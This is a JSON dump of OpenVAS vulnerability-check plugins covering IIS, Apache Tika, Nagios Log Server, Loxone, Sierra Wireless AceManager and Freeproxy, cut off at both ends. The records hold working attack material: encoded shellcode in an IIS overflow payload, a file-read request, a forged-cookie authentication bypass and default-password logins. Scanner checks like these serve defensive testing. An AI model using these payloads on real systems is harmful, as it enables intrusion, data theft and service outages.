pay+=\"\\xe7\\xa5\\x88\\xe6\\x85\\xb5\\xe4\\xbd\\x83\\xe6\\xbd\\xa7\\xe6\\xad\\xaf\\xe4\\xa1\\x85\\xe3\\x99\\x86\\xe6\\x9d\\xb5\\xe4\\x90\\xb3\\xe3\\xa1\\xb1\\xe5\\x9d\\xa5\\xe5\\xa9\\xa2\\xe5\\x90\\xb5\\xe5\\x99\\xa1\\xe6\\xa5\\x92\\xe6\\xa9\\x93\\xe5\\x85\\x97\\xe3\\xa1\\x8e\\xe5\\xa5\\x88\\xe6\\x8d\\x95\\xe4\\xa5\\xb1\\xe4\\x8d\\xa4\\xe6\\x91\\xb2\\xe3\\x91\\xa8\\xe4\\x9d\\x98\\xe7\\x85\\xb9\\xe3\\x8d\\xab\\xe6\\xad\\x95\\xe6\\xb5\\x88\\xe5\\x81\\x8f\\xe7\\xa9\\x86\\xe3\\x91\\xb1\\xe6\\xbd\\x94\\xe7\\x91\\x83\\xe5\\xa5\\x96\\xe6\\xbd\\xaf\\xe7\\x8d\\x81\\xe3\\x91\\x97\\xe6\\x85\\xa8\\xe7\\xa9\\xb2\\xe3\\x9d\\x85\\xe4\\xb5\\x89\\xe5\\x9d\\x8e\\xe5\\x91\\x88\\xe4\\xb0\\xb8\\xe3\\x99\\xba\\xe3\\x95\\xb2\\xe6\\x89\\xa6\\xe6\\xb9\\x83\\xe4\\xa1\\xad\\xe3\\x95\\x88\\xe6\\x85\\xb7\\xe4\\xb5\\x9a\\xe6\\x85\\xb4\\xe4\\x84\\xb3\\xe4\\x8d\\xa5\\xe5\\x89\\xb2\\xe6\\xb5\\xa9\\xe3\\x99\\xb1\\xe4\\xb9\\xa4\\xe6\\xb8\\xb9\\xe6\\x8d\\x93\\xe6\\xad\\xa4\\xe5\\x85\\x86\\xe4\\xbc\\xb0\\xe7\\xa1\\xaf\\xe7\\x89\\x93\\xe6\\x9d\\x90\\xe4\\x95\\x93\\xe7\\xa9\\xa3\\xe7\\x84\\xb9\\xe4\\xbd\\x93\\xe4\\x91\\x96\\xe6\\xbc\\xb6\\xe7\\x8d\\xb9\\xe6\\xa1\\xb7\\xe7\\xa9\\x96\\xe6\\x85\\x8a\\xe3\\xa5\\x85\\xe3\\x98\\xb9\\xe6\\xb0\\xb9\\xe4\\x94\\xb1\\xe3\\x91\\xb2\\xe5\\x8d\\xa5\\xe5\\xa1\\x8a\\xe4\\x91\\x8e\\xe7\\xa9\\x84\\xe6\\xb0\\xb5\\xe5\\xa9\\x96\\xe6\\x89\\x81\\xe6\\xb9\\xb2\\xe6\\x98\\xb1\\xe5\\xa5\\x99\\xe5\\x90\\xb3\\xe3\\x85\\x82\\xe5\\xa1\\xa5\\xe5\\xa5\\x81\\xe7\\x85\\x90\\xe3\\x80\\xb6\\xe5\\x9d\\xb7\\xe4\\x91\\x97\\xe5\\x8d\\xa1\\xe1\\x8f\\x80\\xe6\\xa0\\x83\\xe6\\xb9\\x8f\\xe6\\xa0\\x80\\xe6\\xb9\\x8f\\xe6\\xa0\\x80\\xe4\\x89\\x87\\xe7\\x99\\xaa\\xe1\\x8f\\x80\\xe6\\xa0\\x83\\xe4\\x89\\x97\\xe4\\xbd\\xb4\\xe5\\xa5\\x87\\xe5\\x88\\xb4\\xe4\\xad\\xa6\\xe4\\xad\\x82\\xe7\\x91\\xa4\\xe7\\xa1\\xaf\\xe6\\x82\\x82\\xe6\\xa0\\x81\\xe5\\x84\\xb5\\xe7\\x89\\xba\\xe7\\x91\\xba\\xe4\\xb5\\x87\\xe4\\x91\\x99\\xe5\\x9d\\x97\\xeb\\x84\\x93\\xe6\\xa0\\x80\\xe3\\x85\\xb6\\xe6\\xb9\\xaf\\xe2\\x93\\xa3\\xe6\\xa0\\x81\\xe1\\x91\\xa0\\xe6\\xa0\\x83\\xcc\\x80\\xe7\\xbf\\xbe\\xef\\xbf\\xbf\\xef\\xbf\\xbf\\xe1\\x8f\\x80\\xe6\\xa0\\x83\\xd1\\xae\\xe6\\xa0\\x83\\xe7\\x85\\xae\\xe7\\x91\\xb0\\xe1\\x90\\xb4\\xe6\\xa0\\x83\\xe2\\xa7\\xa7\\xe6\\xa0\\x81\\xe9\\x8e\\x91\\xe6\\xa0\\x80\\xe3\\xa4\\xb1\\xe6\\x99\\xae\\xe4\\xa5\\x95\\xe3\\x81\\x92\\xe5\\x91\\xab\\xe7\\x99\\xab\\xe7\\x89\\x8a\\xe7\\xa5\\xa1\\xe1\\x90\\x9c\\xe6\\xa0\\x83\\xe6\\xb8\\x85\\xe6\\xa0\\x80\\xe7\\x9c\\xb2\\xe7\\xa5\\xa8\\xe4\\xb5\\xa9\\xe3\\x99\\xac\\xe4\\x91\\xa8\\xe4\\xb5\\xb0\\xe8\\x89\\x86\\xe6\\xa0\\x80\\xe4\\xa1\\xb7\\xe3\\x89\\x93\\xe1\\xb6\\xaa\\xe6\\xa0\\x82\\xe6\\xbd\\xaa\\xe4\\x8c\\xb5\\xe1\\x8f\\xb8\\xe6\\xa0\\x83\\xe2\\xa7\\xa7\\xe6\\xa0\\x81\";\n shellcode='VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB6X6WMV7O7Z8Z8Y8Y2TMTJT1M017Y6Q01010ELSKS0ELS3SJM0K7T0J061K4K6U7W5KJLOLMR5ZNL0ZMV5L5LMX1ZLP0V3L5O5SLZ5Y4PKT4P4O5O4U3YJL7NLU8PMP1QMTMK051P1Q0F6T00NZLL2K5U0O0X6P0NKS0L6P6S8S2O4Q1U1X06013W7M0B2X5O5R2O02LTLPMK7UKL1Y9T1Z7Q0FLW2RKU1P7XKQ3O4S2ULR0DJN5Q4W1O0HMQLO3T1Y9V8V0O1U0C5LKX1Y0R2QMS4U9O2T9TML5K0RMP0E3OJZ2QMSNNKS1Q4L4O5Q9YMP9K9K6SNNLZ1Y8NMLML2Q8Q002U100Z9OKR1M3Y5TJM7OLX8P3ULY7Y0Y7X4YMW5MJULY7R1MKRKQ5W0X0N3U1KLP9O1P1L3W9P5POO0F2SMXJNJMJS8KJNKPA';\n pay+=shellcode;\n pay+='>\\r\\n\\r\\n';\n\n buf = http_keepalive_send_recv( port:port, data:pay, bodyonly:FALSE );\n\n # Send a second request to confirm the DoS-condition\n res_2 = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n if( res_2 !~ \"^HTTP/1\\.[01] 200\" ) {\n security_message( port:port, data:\"Due to the presence of the vulnerability and the remote active check the IIS has fallen into a denial-of-service condition and has to be restarted.\" );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:48:50", "references": ["http://www.openwall.com/lists/oss-security/2015/08/13/5", "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2015-3271", "http://seclists.org/oss-sec/2015/q3/350"], "pluginID": "1361412562310810252", "description": "The host is installed with Apache Tika Server\n and is prone to an information disclosure vulnerability.", "edition": 5, "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "published": "2016-12-20T00:00:00", "title": "Apache Tika Server 'fileUrl' Header Information Disclosure Vulnerability", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3271"], "modified": "2018-08-16T00:00:00", "id": "OPENVAS:1361412562310810252", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810252", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_tika_server_info_disc_vuln.nasl 11008 2018-08-16 13:26:16Z cfischer $\n#\n# Apache Tika Server 'fileUrl' Header Information Disclosure Vulnerability\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:tika\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810252\");\n script_version(\"$Revision: 11008 $\");\n script_cve_id(\"CVE-2015-3271\");\n script_bugtraq_id(9502);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-08-16 15:26:16 +0200 (Thu, 16 Aug 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-20 17:03:54 +0530 (Tue, 20 Dec 2016)\");\n script_name(\"Apache Tika Server 'fileUrl' Header Information Disclosure Vulnerability\");\n script_tag(name:\"summary\", value:\"The host is installed with Apache Tika Server\n and is prone to an information disclosure vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send the crafted http PUT request\n and check whether it is able to read arbitrary file or not.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to it provides optional\n functionality to run itself as a web service to allow remote use. When used in\n this manner, it is possible for a 3rd party to pass a 'fileUrl' header to the\n Apache Tika Server (tika-server).\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a remote\n attacker to read arbitrary files, this could be used to return sensitive content\n from the server machine.\n\n Impact Level: Application\");\n\n script_tag(name:\"affected\", value:\"Apache Tika Server 1.9\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Tika Server 1.10 or later,\n For updates refer to https://tika.apache.org\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_xref(name:\"URL\", value:\"http://seclists.org/oss-sec/2015/q3/350\");\n script_xref(name:\"URL\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2015-3271\");\n script_xref(name:\"URL\", value:\"http://www.openwall.com/lists/oss-security/2015/08/13/5\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_tika_server_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"Apache/Tika/Server/Installed\");\n script_require_ports(\"Services/www\", 9998);\n\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif(!tikaPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:tikaPort)){\n exit(0);\n}\n\nif( dir == \"/\" ) dir = \"\";\n\nurl = dir + '/tika';\n\nfiles = traversal_files();\n\nuseragent = get_http_user_agent();\nhost = http_host_name(port: tikaPort);\n\nforeach file (keys(files))\n{\n req = 'PUT ' + url + ' HTTP/1.1\\r\\n' +\n 'Host: ' + host + '\\r\\n' +\n 'User-Agent: ' + useragent + '\\r\\n' +\n 'Accept: text/plain\\r\\n' +\n 'fileUrl:file:///' + files[file] + '\\r\\n\\r\\n';\n\n res = http_keepalive_send_recv(port: tikaPort, data: req);\n\n if(\"; for 16-bit app support\" >< res || \"[boot loader]\" >< res ||\n res =~ \"root:.*:0:\")\n {\n report = report_vuln_url(port:tikaPort, url:url);\n security_message(port:tikaPort, data:report);\n exit(0);\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-24T21:22:37", "references": ["http://seclists.org/fulldisclosure/2016/Aug/56"], "pluginID": "1361412562310107059", "description": "Nagios Log Server is prone to multiple vulnerabilities, including authentication\n bypass, stored cross site scripting, inconsistent authorization controls and privilege escalation vulnerability.", "edition": 4, "reporter": "This script is Copyright (C) 2016 Greenbone Networks GmbH", "published": "2016-10-12T00:00:00", "title": "Nagios Log Server Multiple Vulnerabilities", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": [], "modified": "2018-08-16T00:00:00", "id": "OPENVAS:1361412562310107059", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310107059", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_nagiosls_mul_vul_oct_16.nasl 11008 2018-08-16 13:26:16Z cfischer $#\n# Nagios Log Server Multiple Vulnerabilities\n#\n# Authors:\n# Tameem Eissa <tameem.eissa@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:nagios:nagiosls\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.107059\");\n script_version(\"$Revision: 11008 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-08-16 15:26:16 +0200 (Thu, 16 Aug 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-10-12 13:26:09 +0700 (Wed, 12 Oct 2016)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_tag(name:\"qod_type\", value:\"remote_active\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Nagios Log Server Multiple Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_nagios_log_serv_detect.nasl\");\n script_mandatory_keys(\"nagiosls/installed\");\n script_require_ports(\"Services/www\", 80);\n\n script_tag(name:\"summary\", value:\"Nagios Log Server is prone to multiple vulnerabilities, including authentication\n bypass, stored cross site scripting, inconsistent authorization controls and privilege escalation vulnerability.\");\n\n script_tag(name:\"affected\", value:\"Nagios Log Server 1.4.1 and before.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to version 1.4.2.\");\n\n script_xref(name:\"URL\", value:\"http://seclists.org/fulldisclosure/2016/Aug/56\");\n\n script_tag(name:\"vuldetect\", value:\"Sends a crafted HTTP POST request and checks the response.\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"url_func.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! infos = get_app_version_and_location( cpe:CPE, port:port, exit_no_version:TRUE ) ) exit( 0 );\n\nappVer = infos['version'];\nif( ! dir = infos['location'] ) exit( 0 );\nif( dir == \"/\" ) dir = \"\";\n\nhost = get_host_ip();\nsource_ip = this_host();\nusr_agnt = get_http_user_agent();\nsession = string('a:12:{s:10:\"session_id\";s:32:\"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\";s:10:\"ip_address\";s:',strlen(source_ip),':', source_ip, ';s:10:\"user_agent\";s:', strlen(usr_agnt), ':', usr_agnt,';s:13:\"last_activity\";i:1476194170;s:9:\"user_data\";s:0:\"\";s:7:\"user_id\";s:1:\"1\";s:8:\"username\";s:4:\"XXXX\";s:5:\"email\";s:16:\"test@example.com\";s:12:\"ls_logged_in\";i:1;s:10:\"apisession\";i:1;s:8:\"language\";s:7:\"default\";s:17:\"flash:old:message\";N;}');\n\nencryption_key = SHA1(host);\nhmac_check = HMAC_SHA1(data: session, key: hexstr(encryption_key));\ncookie = string (session, hexstr(hmac_check));\ncookie2 = urlencode(str:cookie);\n\nurl = dir + \"/index.php/dashboard/dashlet\";\n\nreq = http_post_req( port: port,\n url: url,\n accept_header:'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n add_headers: make_array(\"Cookie\", cookie2,\n \"Content-Type\", \"application/x-www-form-urlencoded\") );\nres = http_keepalive_send_recv(port:port, data:req);\n\nif ((res =~ \"^HTTP/1\\.[01] 200\") && (version_is_less_equal(version: appVer, test_version:\"1.4.1\"))) {\n report = report_vuln_url( port:port, url:url ) + '\\n\\n';\n report += \"It might be possible to bypass the authentication using the session cookie: \" + cookie + '\\n';\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-24T21:22:37", "references": ["https://osvdb.info/OSVDB-98155"], "pluginID": "1361412562310107045", "description": "The remote Loxone installation has default credentials set.", "edition": 5, "reporter": "This script is Copyright (C) 2016 Greenbone Networks GmbH", "published": "2016-09-07T00:00:00", "title": "Loxone Smart Home Default Admin HTTP Login", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": [], "modified": "2018-08-16T00:00:00", "id": "OPENVAS:1361412562310107045", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310107045", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_loxone_default_login.nasl 11008 2018-08-16 13:26:16Z cfischer $\n#\n# Loxone Default Login Credentials Vulenrability\n#\n# Authors:\n# Tameem Eissa <tameem.eissa@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:loxone:loxone';\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.107045\");\n script_version(\"$Revision: 11008 $\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_name(\"Loxone Smart Home Default Admin HTTP Login\");\n\n script_tag(name:\"impact\", value:\"Attackers can exploit this issue to obtain sensitive information that may lead to further attacks.\");\n script_tag(name:\"vuldetect\", value:\"Try to login with default credentials admin:admin\");\n script_tag(name:\"solution\", value:\"Change the username and password.\");\n script_tag(name:\"summary\", value:\"The remote Loxone installation has default credentials set.\");\n script_tag(name:\"solution_type\", value:\"Workaround\");\n\n script_tag(name:\"qod_type\", value:\"remote_active\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-08-16 15:26:16 +0200 (Thu, 16 Aug 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-09-07 13:18:59 +0200 (Wed, 07 Sep 2016)\");\n script_xref(name:\"URL\", value:\"https://osvdb.info/OSVDB-98155\");\n\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2016 Greenbone Networks GmbH\");\n script_dependencies(\"gb_loxone_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"loxone/web/detected\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\ninclude(\"misc_func.inc\");\n\nfunction newHandshakekey()\n{\n rand = rand_str( length:16, charset: \"0123456789\");\n return base64( str: rand );\n}\n\nusername = \"admin\";\npassword = \"admin\";\n\nif (!http_port = get_app_port(cpe:CPE, service:'www')) exit (0);\n\nuseragent = get_http_user_agent();\nhost = http_host_name(port:http_port);\nrand = rand_str(length:17, charset: \"0123456789\");\nreq = string(\"GET /jdev/sys/getkey?0.\", rand, \" HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", useragent, \"\\r\\n\",\n \"Accept-Encoding: identity\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"\\r\\n\");\n\nres = http_keepalive_send_recv(port:http_port, data:req, bodyonly:FALSE);\n\nif (res !~ \"HTTP/1\\.. 200\" || '{\"LL\": {' >!< res) exit(0);\n\njson_key = eregmatch (pattern: '\"LL\": [{] \"control\": \"dev/sys/getkey\", \"value\": \"([A-F0-9]+)\", \"Code\": \"200\"}}', string: res, icase:TRUE);\nkey = json_key[1];\nif (!key) exit(0);\n\npassphrase = username + \":\" + password;\nkey = hex2str(key);\nprotocol = HMAC_SHA1(data: passphrase, key: key);\nprotocol1 = hexstr( protocol);\nwebsockey_key = newHandshakekey();\n\nreq2 = string(\"GET /ws HTTP/1.1\", \"\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", useragent, \"\\r\\n\",\n \"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n\",\n \"Accept-Language: en-US,en;q=0.5\\r\\n\",\n \"Accept-Encoding: identity\\r\\n\",\n \"Sec-WebSocket-Version: 13\\r\\n\",\n \"origin: http://\", host, \"\\r\\n\",\n \"Sec-WebSocket-Protocol: \", protocol1, \"\\r\\n\",\n \"Sec-WebSocket-Extensions: permessage-deflate\\r\\n\",\n \"Sec-WebSocket-Key: \", websockey_key, \"\\r\\n\",\n \"Connection: keep-alive, Upgrade\\r\\n\",\n \"Pragma: no-cache\\r\\n\",\n \"Cache-Control: no-cache\\r\\n\",\n \"Upgrade: websocket\\r\\n\",\n \"\\r\\n\");\n\nres2 = http_keepalive_send_recv(port:http_port, data:req2);\n\nif (res2 =~ \"HTTP/1\\.. 101 Web Socket Protocol Handshake\" && \"Sec-WebSocket-Accept\" >< res2)\n{\n report = \"It was possible to login into Loxone web interface using username `admin` and password `admin`.\";\n security_message ( port: http_port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-24T21:24:59", "references": [], "pluginID": "1361412562310106077", "description": "Default password for AceManager was found.", "edition": 3, "reporter": "This script is Copyright (C) 2016 Greenbone Networks GmbH", "published": "2016-05-17T00:00:00", "title": "Sierra Wireless AceManager Default Password", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": [], "modified": "2018-08-16T00:00:00", "id": "OPENVAS:1361412562310106077", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106077", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_sierrawireless_acemanager_default_pw.nasl 11008 2018-08-16 13:26:16Z cfischer $\n#\n# Sierra Wireless AceManager Default Password\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/h:sierra_wireless:acemanager';\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106077\");\n script_version(\"$Revision: 11008 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-08-16 15:26:16 +0200 (Thu, 16 Aug 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-05-17 11:21:09 +0700 (Tue, 17 May 2016)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:C\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n script_tag(name:\"solution_type\", value:\"Workaround\");\n\n script_name(\"Sierra Wireless AceManager Default Password\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"This script is Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_sierrawireless_acemanager_detect.nasl\");\n script_mandatory_keys(\"sierra_wireless_acemanager/installed\");\n\n script_tag(name:\"summary\", value:\"Default password for AceManager was found.\");\n\n script_tag(name:\"vuldetect\", value:\"Tries to log in with the default users 'user' and 'viewer'.\");\n\n script_tag(name:\"affected\", value:\"Sierra Wireless devices with AceManager installed.\");\n\n script_tag(name:\"solution\", value:\"Change the password.\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nuseragent = get_http_user_agent();\nhost = http_host_name(port: port);\n\nusers = make_list(\"user\", \"viewer\");\nfound_users = \"\";\n\nforeach user (users) {\n data = '<request xmlns=\"urn:acemanager\">\\r\\n' +\n '<connect>\\r\\n' +\n '<login>' + user + '</login>\\r\\n' +\n '<password><![CDATA[12345]]></password>\\r\\n' +\n '</connect>\\r\\n' +\n '</request>';\n len = strlen(data);\n\n req = 'POST /xml/Connect.xml HTTP/1.1\\r\\n' +\n 'Host: ' + host + '\\r\\n' +\n 'User-Agent: ' + useragent + '\\r\\n' +\n 'Content-Type: text/xml\\r\\n' +\n 'Content-Length: ' + len + '\\r\\n' +\n '\\r\\n' + data;\n res = http_keepalive_send_recv(port: port, data: req);\n\n if (\"status='0' message='OK'\" >< res) {\n if (found_users == \"\")\n found_users = user;\n else\n found_user += ', ' + user;\n }\n}\n\nif (found_users != \"\") {\n report = string(\"It was possible to log in with the user(s) '\", found_users, \"' and the default password '12345'\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-24T21:23:17", "references": ["https://www.exploit-db.com/exploits/39517/"], "pluginID": "1361412562310806895", "description": "This host is installed with Freeproxy\n Internet Suite and is prone to denial of service vulnerability.", "edition": 2, "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "published": "2016-05-17T00:00:00", "title": "Freeproxy Internet Suite Denial of Service Vulnerability", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Denial of Service", "bulletinFamily": "scanner", "cvelist": [], "modified": "2018-08-16T00:00:00", "id": "OPENVAS:1361412562310806895", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806895", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_freeproxy_internet_suite_dos_vul.nasl 11008 2018-08-16 13:26:16Z cfischer $\n#\n# Freeproxy Internet Suite Denial of Service Vulnerability\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:freeproxy_internet_suite:freeproxy\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806895\");\n script_version(\"$Revision: 11008 $\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-08-16 15:26:16 +0200 (Thu, 16 Aug 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-05-17 11:03:06 +0530 (Tue, 17 May 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_name(\"Freeproxy Internet Suite Denial of Service Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Freeproxy\n Internet Suite and is prone to denial of service vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted request via HTTP GET\n and check whether it is able to crash the application or not.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to improper validation of\n GET request to the proxy.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to cause the application to crash, creating a denial-of-service\n condition.\n\n Impact 